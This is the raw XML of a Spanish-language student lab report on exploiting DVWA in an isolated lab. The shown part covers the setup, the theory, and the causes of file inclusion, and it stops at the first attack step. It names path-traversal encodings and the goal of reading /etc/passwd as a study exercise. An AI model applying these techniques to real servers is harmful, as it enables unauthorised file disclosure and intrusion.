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48C56">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>INFORME #2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Gestión de Vulnerabilidades en Aplicaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71532761"/>
    <w:p w14:paraId="0BE0FDE4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4472C4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DVWA: File Inclusion  |  Command Injection  |  Brute Force  |  SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9C5B5E"/>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ACFA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864"/>
          </w:tcPr>
          <w:p w14:paraId="52352367">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Campo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="1EE00AE1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Detalle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7018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8513B7E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Asignatura</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="532F717C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Gestión de Vulnerabilidades en Aplicaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2A8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497E9F02">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Programa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3EE17DF2">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Especialización en Ciberseguridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="668EE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3C9FAA3">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Docente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A3C99F1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Javier Mauricio Durán Vásquez</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="005F9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12DDB806">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Estudiante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="62BB08E6">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Daniel Alejandro Aguirre Ceballos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3403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525E4E4">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Plataforma</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76E9B768">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DVWA (Damn Vulnerable Web Application) — Nivel Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0D832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00C25E05">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Fecha entrega</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6EFC7E46">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>14 de marzo de 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31CC2D9F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19106B39">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Entorno de trabajo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E60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864"/>
          </w:tcPr>
          <w:p w14:paraId="77DD80AE">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Componente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="53DEDDF0">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Detalle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4DCF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7E7A689">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sistema atacante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06120B7D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Kali Linux (VM) — Prompt: danielaguirre@kali:~$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6F3D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22136BF1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sistema víctima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5F4268AB">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Metasploitable con DVWA preinstalado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="478F0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0AE8AEA">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Red</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CE0893E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Red interna entre VMs (sin Internet requerido)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6155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2793B6B6">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nivel DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="15F959B8">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0491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6ECCCF6">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Herramientas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FD407D6">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Firefox, Hydra, sqlmap, Netcat, Metasploit, Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="629BA031"/>
    <w:p w14:paraId="1B336C47">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Marco Teórico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D2334">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>DVWA (Damn Vulnerable Web Application) es una aplicación web diseñada intencionalmente con vulnerabilidades conocidas, utilizada con fines educativos en entornos controlados. Cada módulo reproduce una debilidad real categorizada por estándares internacionales como OWASP Top 10, CWE y CVE, permitiendo al estudiante comprender el ciclo completo de un ataque: identificación, explotación, impacto y mitigación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6993A6E4">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Este informe cubre las vulnerabilidades 5 a 8 del laboratorio, correspondientes al Informe #2. Todas comparten una causa raíz común: la aplicación confía en datos no confiables (input del usuario, parámetros HTTP, archivos cargados) sin tratarlos con la debida desconfianza sistemática. La diferencia entre ataques radica en el vector y el componente del sistema que se ve comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDF9208"/>
    <w:p w14:paraId="468FE32B">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Clasificación OWASP Top 10 (2021) de las vulnerabilidades trabajadas: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266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3864"/>
          </w:tcPr>
          <w:p w14:paraId="7F04FCC1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="1F84EF35">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulnerabilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="07E5EEF2">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Categoría OWASP 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="7C193736">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Severidad típica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4482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521D2FC">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0366D074">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>File Inclusion (LFI/RFI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B07231B">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A05 – Security Misconfiguration / A03 – Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56814A0E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="33C6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CE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="49D1DC23">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3564A8CF">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5F21DBB8">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A03:2021 – Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="51927E02">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6A2B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59D41C2">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00FE40B9">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E15D3A7">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A07:2021 – Identification &amp; Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DBFA2EB">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1410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CE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3E5CE58A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="34D739BE">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SQL Injection (&amp; Blind)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="78EF82D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A03:2021 – Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="48458CF9">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B6CCA43">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="594E2AF9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerabilidad 5 — File Inclusion (LFI / RFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787340C5">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Teoría</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3604BD">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La inclusión de archivos (File Inclusion) es una vulnerabilidad que surge cuando una aplicación web construye dinámicamente la ruta de un archivo a incluir o ejecutar usando datos controlables por el usuario, sin validar ni restringir qué archivos pueden ser referenciados. PHP expone esta debilidad a través de las funciones include(), require(), include_once() y require_once().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA2E2A1"/>
    <w:p w14:paraId="010E313B">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Existen dos variantes con impactos distintos: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66F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3864"/>
          </w:tcPr>
          <w:p w14:paraId="079E76C4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tipo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="111EBE74">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="5C0966D9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Condición necesaria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="6F8B5C79">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Impacto máximo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22C4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BB05327">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>LFI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>(Local File Inclusion)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DDF9EEC">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>El atacante referencia archivos que ya existen en el sistema de archivos local del servidor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D6283A2">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ninguna adicional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="019B738E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Lectura de archivos sensibles (/etc/passwd, claves SSH, credenciales de BD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6603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CE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7788038A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RFI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>(Remote File Inclusion)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="523E53A5">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>El atacante apunta a un archivo PHP alojado en un servidor externo; el servidor víctima lo descarga y ejecuta como código.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7D1048C1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>allow_url_include = On en php.ini</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="05F4C45A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ejecución remota de código (RCE): shell completa del servidor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6288771A"/>
    <w:p w14:paraId="04E36E5F">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Relación con estándares internacionales:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB6A47">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> CWE-22 — Path Traversal: acceso a rutas fuera del directorio permitido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C7282F">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> CWE-98 — PHP Remote File Inclusion: inclusión de archivos remotos sin validación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A497E0B">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> OWASP: A05:2021 – Security Misconfiguration (RFI) / A03:2021 – Injection (LFI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4502E2">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> CVSS v4.0 estimado: 9.1 Critical (RFI con acceso remoto sin autenticación).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F95C1F5"/>
    <w:p w14:paraId="75F2CE24"/>
    <w:p w14:paraId="51CC42CF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>1. Descripción de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4899B811">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La inclusión de archivos sin validación permite al atacante manipular el parámetro ?page= de la URL para referenciar archivos arbitrarios del servidor (LFI) o archivos PHP maliciosos alojados en servidores externos (RFI). En ambos casos la aplicación ejecuta el contenido del archivo en el contexto del servidor web, otorgando al atacante capacidades que van desde la lectura de información sensible hasta la ejecución completa de comandos del sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E3B63">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>2. Causas de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F2A6D7">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a. Ausencia de validaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E43B2E4">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>El parámetro page se pasa directamente a include() sin verificar que el valor pertenezca a un conjunto permitido de archivos ni que la ruta resultante esté contenida dentro del webroot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10687709">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Manejo inadecuado de entradas y salidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DED9D2">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No se eliminan secuencias de path traversal (../, ..\, %2e%2e%2f), characters nulos (%00) ni se restringe el uso de esquemas URL en el parámetro. La directiva allow_url_include = On en php.ini habilita el vector RFI globalmente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDFF2C4">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3. Mecanismo de ataque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B90971D">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ataque LFI — Lectura de archivos locales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8EB9D0">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Objetivo: leer /etc/passwd del servidor para enumerar usuarios del SO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D86F9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 1 — Identificar el parámetro vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCD9D39">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2811145" cy="11766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6"/>
                    <a:srcRect l="20289" t="19185" r="28472" b="36153"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2811145" cy="1176655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
